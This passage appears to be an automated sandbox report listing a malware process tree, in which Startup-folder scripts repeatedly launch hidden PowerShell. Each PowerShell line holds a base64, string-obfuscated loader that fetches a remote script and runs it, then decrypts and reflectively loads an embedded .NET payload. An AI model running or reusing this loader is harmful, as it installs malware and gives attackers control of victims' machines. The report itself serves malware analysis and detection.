5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkbnNvdGcpLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xpbmUpO2ZvcmVhY2ggKCRqb3AgaW4gJG5raWt4KSB7CWlmICgkam9wLlN0YXJ0c1dpdGgoJzo6JykpCXsJCSRja3Vodj0kam9wLlN1YnN0cmluZygyKTsJCWJyZWFrOwl9fSR1Y3ZpZD1bc3RyaW5nW11dJGNrdWh2LlNwbGl0KCdcJyk7SUVYICckbmh3eXc9cG9jeGEgKGxscXV0IChbQUJDQ0FCQ29BQkNuQUJDdkFCQ2VBQkNydF06OkFCQ0ZBQkNyQUJDb0FCQ21BQkNCQUJDYUFCQ3NlNkFCQzRBQkNTQUJDdEFCQ3JpQUJDbkFCQ2dBQkMoJHVjdmlkWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJGZsZmxzPXBvY3hhIChsbHF1dCAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCR1Y3ZpZFsxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtnbXZtciAkbmh3eXcgJG51bGw7Z212bXIgJGZsZmxzICgsW3N0cmluZ1tdXSAoJyVBQkMnKSk7')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 2532 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_81f4ce5e.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 2456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1756 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_81f4ce5e.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6580 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkbnNvdGcpLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xpbmUpO2ZvcmVhY2ggKCRqb3AgaW4gJG5raWt4KSB7CWlmICgkam9wLlN0YXJ0c1dpdGgoJzo6JykpCXsJCSRja3Vodj0kam9wLlN1YnN0cmluZygyKTsJCWJyZWFrOwl9fSR1Y3ZpZD1bc3RyaW5nW11dJGNrdWh2LlNwbGl0KCdcJyk7SUVYICckbmh3eXc9cG9jeGEgKGxscXV0IChbQUJDQ0FCQ29BQkNuQUJDdkFCQ2VBQkNydF06OkFCQ0ZBQkNyQUJDb0FCQ21BQkNCQUJDYUFCQ3NlNkFCQzRBQkNTQUJDdEFCQ3JpQUJDbkFCQ2dBQkMoJHVjdmlkWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJGZsZmxzPXBvY3hhIChsbHF1dCAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCR1Y3ZpZFsxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtnbXZtciAkbmh3eXcgJG51bGw7Z212bXIgJGZsZmxzICgsW3N0cmluZ1tdXSAoJyVBQkMnKSk7')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 5488 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4a774a3c.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 1012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3328 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4a774a3c.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5732 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkbnNvdGcpLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xpbmUpO2ZvcmVhY2ggKCRqb3AgaW4gJG5raWt4KSB7CWlmICgkam9wLlN0YXJ0c1dpdGgoJzo6JykpCXsJCSRja3Vodj0kam9wLlN1YnN0cmluZygyKTsJCWJyZWFrOwl9fSR1Y3ZpZD1bc3RyaW5nW11dJGNrdWh2LlNwbGl0KCdcJyk7SUVYICckbmh3eXc9cG9jeGEgKGxscXV0IChbQUJDQ0FCQ29BQkNuQUJDdkFCQ2VBQkNydF06OkFCQ0ZBQkNyQUJDb0FCQ21BQkNCQUJDYUFCQ3NlNkFCQzRBQkNTQUJDdEFCQ3JpQUJDbkFCQ2dBQkMoJHVjdmlkWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJGZsZmxzPXBvY3hhIChsbHF1dCAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCR1Y3ZpZFsxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtnbXZtciAkbmh3eXcgJG51bGw7Z212bXIgJGZsZmxzICgsW3N0cmluZ1tdXSAoJyVBQkMnKSk7')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 2452 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_25a2536c.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1668 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_25a2536c.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5288 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkbnNvdGcpLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xpbmUpO2ZvcmVhY2ggKCRqb3AgaW4gJG5raWt4KSB7CWlmICgkam9wLlN0YXJ0c1dpdGgoJzo6JykpCXsJCSRja3Vodj0kam9wLlN1YnN0cmluZygyKTsJCWJyZWFrOwl9fSR1Y3ZpZD1bc3RyaW5nW11dJGNrdWh2LlNwbGl0KCdcJyk7SUVYICckbmh3eXc9cG9jeGEgKGxscXV0IChbQUJDQ0FCQ29BQkNuQUJDdkFCQ2VBQkNydF06OkFCQ0ZBQkNyQUJDb0FCQ21BQkNCQUJDYUFCQ3NlNkFCQzRBQkNTQUJDdEFCQ3JpQUJDbkFCQ2dBQkMoJHVjdmlkWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJGZsZmxzPXBvY3hhIChsbHF1dCAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCR1Y3ZpZFsxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtnbXZtciAkbmh3eXcgJG51bGw7Z212bXIgJGZsZmxzICgsW3N0cmluZ1tdXSAoJyVBQkMnKSk7')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 2156 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_e29f9ec9.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
